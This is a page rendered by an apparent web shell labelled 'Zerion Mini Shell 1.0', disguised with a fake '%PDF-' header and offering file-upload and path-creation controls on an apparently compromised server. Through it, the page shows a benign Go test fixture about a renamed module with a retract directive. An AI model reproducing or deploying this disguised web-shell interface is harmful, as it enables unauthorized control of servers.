%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /usr/local/go/src/cmd/go/testdata/mod/
Upload File :
Create Path :
Current File : //usr/local/go/src/cmd/go/testdata/mod/example.com_retract_rename_v1.9.0-new.txt

Module example.com/retract/rename is renamed in this version.

This happens frequently when a repository is renamed or when a go.mod file
is added for the first time with a custom module path.
-- .info --
{"Version":"v1.9.0-new"}
-- .mod --
module example.com/retract/newname

go 1.16

// bad
retract v1.0.0-bad
-- go.mod --
module example.com/retract/newname

go 1.16

// bad
retract v1.0.0-bad
-- newname.go --
package newname

Zerion Mini Shell 1.0